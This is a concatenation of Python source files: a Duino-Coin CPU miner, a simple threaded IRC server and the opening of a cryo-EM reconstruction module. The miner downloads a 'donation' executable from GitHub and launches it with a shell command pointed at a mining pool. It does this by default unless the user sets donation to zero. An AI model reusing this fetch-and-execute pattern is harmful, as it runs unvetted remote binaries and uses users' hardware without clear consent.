r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("zh"):
lang = "chinese_simplified"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
def getString(string_name):
# Get string form language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debugOutput(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
prettyPrint(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debugOutput("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " @ "
+ diffName)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
if osname == "nt":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable.exe").is_file():
debugOutput(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableWindows.exe?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable.exe", "wb") as f:
f.write(r.content)
elif osname == "posix":
# Initial miner executable section
if not Path(RESOURCES_DIR + "/Donate_executable").is_file():
debugOutput(
"OS is Windows, downloading developer donation executable")
url = ("https://github.com/"
+ "revoxhere/"
+ "duino-coin/blob/useful-tools/"
+ "DonateExecutableLinux?raw=true")
r = requests.get(url)
with open(RESOURCES_DIR + "/Donate_executable", "wb") as f:
f.write(r.content)
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_username")
+ Fore.RESET
+ Style.BRIGHT)
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_intensity")
+ Fore.RESET
+ Style.BRIGHT)
threadcount = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_threads")
+ str(cpu_count())
+ "): "
+ Fore.RESET
+ Style.BRIGHT)
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - "
+ getString("low_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - "
+ getString("medium_diff"))
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "3"
+ Style.NORMAL
+ " - "
+ getString("net_diff"))
requested_diff = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_difficulty")
+ Fore.RESET
+ Style.BRIGHT)
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_identifier")
+ Fore.RESET
+ Style.BRIGHT)
if rig_identiier == "y" or rig_identiier == "Y":
rig_identiier = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_rig_name")
+ Fore.RESET
+ Style.BRIGHT)
else:
rig_identiier = "None"
donation_level = "0"
if osname == "nt" or osname == "posix":
donation_level = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_donation_level")
+ Fore.RESET
+ Style.BRIGHT)
# Check wheter efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
# Check wheter threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
# Check wheter algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
# Check wheter diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "NET"
# Check wheter donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n"
}
# Write data to configfile
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
# Calulate efficiency for later use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["miner"]["username"]
efficiency = config["miner"]["efficiency"]
threadcount = config["miner"]["threads"]
requested_diff = config["miner"]["requested_diff"]
donation_level = config["miner"]["donate"]
algorithm = config["miner"]["algorithm"]
rig_identiier = config["miner"]["identifier"]
debug = config["miner"]["debug"]
# Calulate efficiency for use with sleep function
efficiency = (100 - float(efficiency)) * 0.01
def Donate():
global donation_level
global donatorrunning
global donateExecutable
if osname == "nt":
cmd = (
"cd "
+ RESOURCES_DIR
+ "& Donate_executable.exe "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
elif osname == "posix":
cmd = (
"cd "
+ RESOURCES_DIR
+ "&& chmod +x Donate_executable "
+ "&& ./Donate_executable "
+ "-o stratum+tcp://xmg.minerclaim.net:7008 "
+ "-u revox.donate "
+ "-p x -s 4 -e ")
if int(donation_level) <= 0:
prettyPrint(
"sys0",
Fore.YELLOW
+ getString("free_network_warning")
+ getString("donate_warning")
+ Fore.GREEN
+ "https://duinocoin.com/donate"
+ Fore.YELLOW
+ getString("learn_more_donate"),
"warning")
sleep(10)
elif donatorrunning == False:
if int(donation_level) == 5:
cmd += "95"
elif int(donation_level) == 4:
cmd += "75"
elif int(donation_level) == 3:
cmd += "50"
elif int(donation_level) == 2:
cmd += "20"
elif int(donation_level) == 1:
cmd += "10"
if int(donation_level) > 0:
debugOutput(getString("starting_donation"))
donatorrunning = True
# Launch CMD as subprocess
donateExecutable = Popen(
cmd, shell=True, stderr=DEVNULL)
prettyPrint(
"sys0",
getString("thanks_donation"),
"warning")
def ducos1(
lastBlockHash,
expectedHash,
difficulty):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
# Loop from 1 too 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty):
# XXHASH algorithm
# Measure starting time
timeStart = time()
# Loop from 1 too 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean):
# Mining section for every thread
while True:
# Grab server IP and port
while True:
try:
# Use request to grab data from raw github file
res = requests.get(server_ip_file, data=None)
if res.status_code == 200:
# Read content and split into lines
content = (res.content.decode().splitlines())
# Line 1 = IP
masterServer_address = content[0]
# Line 2 = port
masterServer_port = content[1]
debugOutput(
"Retrieved pool IP: "
+ masterServer_address
+ ":"
+ str(masterServer_port))
break
except Exception as e:
# If there was an error with grabbing data from GitHub
prettyPrint(
"net"
+ str(threadid),
getString("data_error")
+ Style.NORMAL
+ Fore.RESET
+ " (git err: "
+ str(e)
+ ")",
"error")
debugOutput("GitHub error: " + str(e))
sleep(10)
# Connect to the server
while True:
try:
soc = socket()
# Establish socket connection to the server
soc.connect((str(masterServer_address),
int(masterServer_port)))
soc.settimeout(SOC_TIMEOUT)
serverVersion = soc.recv(3).decode().rstrip(
"\n") # Get server version
debugOutput("Server version: " + serverVersion)
if (float(serverVersion) <= float(MINER_VER)
and len(serverVersion) == 3):
# If miner is up-to-date, display a message and continue
prettyPrint(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(serverVersion)
+ ")",
"success")
break
else:
# Miner is outdated
prettyPrint(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ serverVersion
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
break
except Exception as e:
# Socket connection error
prettyPrint(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debugOutput("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
prettyPrint(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
# If efficiency lower than 100...
if float(100 - efficiency * 100) < 100:
# ...sleep some time
sleep(float(efficiency * 5))
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",") # Get work from pool
debugOutput("Received: " + str(job))
if job[1] == "This user doesn't exist":
prettyPrint(
"cpu"
+ str(threadid),
getString("mining_user")
+ str(username)
+ getString("mining_not_exist")
+ Style.NORMAL
+ Fore.RESET
+ getString("mining_not_exist_warning"),
"error")
sleep(10)
elif job[0] and job[1] and job[2]:
diff = int(job[2])
debugOutput(str(threadid) +
"Job received: "
+ str(job))
# If job received, continue to hashing algo
break
while True:
# Call DUCOS-1 hasher
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff)
computetimeStop = time()
# Measure compute time
computetime = computetimeStop - computetimeStart
# Convert it to miliseconds
computetime = computetime
# Read result from ducos1 hasher
ducos1res = result[0]
debugOutput("Thread "
+ str(threadid)
+ ": result found: "
+ str(ducos1res))
# Convert H/s to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
# Calculate total hashrate of all thrads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(ducos1res)
+ ","
+ str(threadhashcount * 1000)
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
# Get feedback
feedback = soc.recv(8).decode().rstrip("\n")
responsetimestop = now()
# Measure server ping
ping = str(int(
(responsetimestop - responsetimetart).microseconds
/ 1000))
debugOutput("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
else:
# Stay with kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 2000
and accepted.value % 10 == 0):
prettyPrint("sys0",
" " + getString("max_hashrate_notice"),
"warning")
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ✓"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ✓"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ algo_back_color
+ Back.YELLOW
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " @ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
break
break
except Exception as e:
prettyPrint(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debugOutput("Error while mining: " + str(e))
sleep(5)
break
def prettyPrint(messageType, message, state):
# Print output messages in the DUCO "standard"
# Usb/net/sys background
if messageType.startswith("net"):
background = Back.BLUE
elif messageType.startswith("cpu"):
background = Back.YELLOW
if messageType.startswith("sys"):
background = Back.GREEN
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ messageType
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debugOutput("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debugOutput("Rich presence updated")
except Exception as e:
# Discord not launched
debugOutput("Error launching Discord RPC thead: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
# Processor info
cpu = cpuinfo.get_cpu_info()
# Colorama
init(autoreset=True)
title(getString("duco_python_miner") + str(MINER_VER) + ")")
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
prettyPrint(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 15s.",
"error")
sleep(15)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debugOutput("Config file loaded")
except Exception as e:
prettyPrint(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debugOutput("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debugOutput("Greeting displayed")
except Exception as e:
prettyPrint(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debugOutput("Error displaying greeting message: " + str(e))
try:
# Start donation thread
Donate()
except Exception as e:
debugOutput("Error launching donation thread: " + str(e))
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean))
thread[x].start()
sleep(0.1)
except Exception as e:
prettyPrint(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debugOutput("Error launching CPU thead(s): " + str(e))
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debugOutput("Error launching Discord RPC thead: " + str(e))
|
irc_server.py
|
import logging
import socket
import threading
import click
logging.basicConfig(filename="server.log", level=logging.DEBUG)
logger = logging.getLogger()
class IRCServer:
def __init__(self, port):
# Need to use gethostbyname_ex() when host has multiple interfaces
self.host = socket.gethostbyname_ex(socket.gethostname())[2][1]
self.port = port
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.bind((self.host, self.port))
self.socket.settimeout(2)
self.subscribers = []
self.nicknames = []
def add_subscriber(self, conn):
self.subscribers.append(conn)
def rm_subscriber(self, conn):
try:
self.subscribers.remove(conn)
except ValueError:
pass
def rm_nickname(self, nickname):
try:
self.nicknames.remove(nickname)
except ValueError:
pass
def notify(self, msg):
for s in self.subscribers:
self.update(s, msg)
def update(self, conn, msg):
message = msg.encode("utf-8")
msg_length = len(message)
send_length = str(msg_length).encode("utf-8")
send_length += b" " * (64 - len(send_length))
conn.send(send_length)
conn.send(message)
logger.info(f"IRCServer.send -> msg: {msg}")
def handle_client(self, conn, addr):
print(f"[CONNECTION] Client {addr} has connected.")
connected = True
client_nickname = str()
while connected:
msg_length = int(conn.recv(64).decode("utf-8"))
msg = conn.recv(msg_length).decode("utf-8")
logger.info(f"IRCServer.recv -> msg: {msg}")
if msg == "QUIT":
connected = False
elif msg.startswith("NICK"):
# Next message should be a USER command
ml = int(conn.recv(64).decode("utf-8"))
user_msg = conn.recv(ml).decode("utf-8")
logger.info(f"IRCServer.recv -> msg: {user_msg}")
nickname = msg.split()[1]
if nickname not in self.nicknames:
client_nickname = nickname
self.nicknames.append(client_nickname)
self.update(
conn,
f"001 {client_nickname} :Welcome to the Internet Relay Network {client_nickname}!",
)
else:
self.update(conn, f"433 * {nickname} :Nickname is already in use.")
elif msg.startswith("JOIN"):
self.add_subscriber(conn)
self.notify(f":{client_nickname} {msg}")
elif msg.startswith("PART"):
self.notify(f":{client_nickname} {msg}")
else:
# Notify all client connections (regular PRIVMSG command)
self.notify(f":{client_nickname} {msg}")
self.rm_nickname(client_nickname)
self.rm_subscriber(conn)
print(f"[DISCONNECTION] Client {addr} has disconnected.")
conn.close()
def start(self):
print("[STARTING] Server is starting...")
self.socket.listen()
print(f"[LISTENING] Server is listening on {self.host}:{self.port}")
while True:
try:
conn, addr = self.socket.accept()
threading.Thread(target=self.handle_client, args=(conn, addr)).start()
except socket.timeout:
continue
except KeyboardInterrupt:
raise
@click.command()
@click.option("--port", default=50007, help="Target port to use", show_default=True)
def main(port):
server = IRCServer(port=port)
try:
server.start()
except KeyboardInterrupt:
print("[STOPPING] Server is stopping...")
logger.debug("Signifies end of process")
if __name__ == "__main__":
main()
|
reconstructor.py
|
from __future__ import print_function, division
import time, os, sys
from datetime import datetime
from cryoio.imagestack import MRCImageStack, CombinedImageStack
from cryoio.ctfstack import CTFStack, CombinedCTFStack
from cryoio.dataset import CryoDataset
opj = os.path.join
from copy import copy, deepcopy
import numpy as np
from shutil import copyfile
from util import BackgroundWorker, Output, OutputStream, Params, format_timedelta, gitutil, FiniteRunningSum
import cryoem
import cryoops
from objectives import eval_objective, SumObjectives
from importancesampler.gaussian import FixedGaussianImportanceSampler
from importancesampler.fisher import FixedFisherImportanceSampler
try:
import cPickle as pickle # python 2
except ImportError:
import pickle # python 3
import socket
from threading import Thread
try:
from Queue import Queue # python 2
except ModuleNotFoundError:
from queue import Queue # python 3
from optimizers.sagd import SAGDStep
from optimizers.sgd import SGDMomentumStep
from cryoio.mrc import writeMRC, readMRC
from symmetry import get_symmetryop
import density
import geometry
# precond should ideally be set to inv(chol(H)) where H is the Hessian
def density2params(M,fM,xtype,grad_transform = False,precond = None):
if xtype == 'real':
if grad_transform:
x0 = M if precond is None else M * precond
else:
x0 = M if precond is None else M / precond
elif xtype == 'complex':
raise NotImplementedError()
if grad_transform:
x0 = fM if precond is None else fM * precond
else:
x0 = fM if precond is None else fM / precond
elif xtype == 'complex_coeff':
raise NotImplementedError()
if grad_transform:
pfM = fM if precond is None else fM * precond
else:
pfM = fM if precond is None else fM / precond
x0 = np.empty((2*fM.size,),dtype=density.real_t)
x0[0:fM.size] = pfM.real.reshape((-1,))
x0[fM.size:] = pfM.imag.reshape((-1,))
elif xtype == 'complex_herm_coeff':
raise NotImplementedError()
assert precond is None, 'Unimplemented'
N = fM.shape[0]
NC = int(N/2) + 1
startFreq = int(1-(N%2))
herm_freqs = fM[0:NC,:,:]
if startFreq:
herm_freqs += np.roll(np.roll(np.roll(fM[::-1, ::-1, ::-1], \
1, axis=0), \
1, axis=1), \
1, axis=2)[0:NC,:,:].conj()
else:
herm_freqs += fM[::-1, ::-1, ::-1][0:NC,:,:].conj()
if not grad_transform:
herm_freqs *= 0.5
x0 = np.empty((2*NC*N**2,),dtype=density.real_t)
x0[0:NC*N**2] = herm_freqs.real.reshape((-1,))
x0[NC*N**2:] = herm_freqs.imag.reshape((-1,))
return x0
def param2density(x,xtype,sz,precond = None):
if xtype == 'real':
M, fM = x.reshape(sz), None
if precond is not None:
M = M * precond
elif xtype == 'complex':
raise NotImplementedError()
M, fM = None, x.reshape(sz)
if precond is not None:
fM = fM * precond
elif xtype == 'complex_coeff':
raise NotImplementedError()
M, fM = None, density.empty_cplx(sz)
fM.real = x[0:fM.size].reshape(sz)
fM.imag = x[fM.size:].reshape(sz)
if precond is not None:
fM *= precond
elif xtype == 'complex_herm_coeff':
raise NotImplementedError()
assert precond is None, 'Unimplemented'
M, fM = None, density.empty_cplx(sz)
N = sz[0]
NC = int(N/2) + 1
startFreq = int(1-(N%2))
zeroFreq = int(N/2)
herm_freqs = np.empty((NC,N,N),dtype=density.complex_t)
herm_freqs.real = x[0:NC*N**2].reshape(herm_freqs.shape)
herm_freqs.imag = x[NC*N**2:].reshape(herm_freqs.shape)
fM[0:NC,:,:] = herm_freqs
if startFreq:
fM[NC:,:,:] = np.roll(np.roll(herm_freqs[startFreq:zeroFreq,:,:][::-1,::-1,::-1].conj(), \
1, axis=1), 1, axis=2)
else:
fM[NC:,:,:] = herm_freqs[startFreq:zeroFreq,:,:][::-1,::-1,::-1].conj()
return M,fM
"""
This class is meant to wrap an objective function and deal with
reducing FFTs while allowing the optimizers to not need to know anything
about the real-space versus fourier space (or whatever) parameterizations.
"""
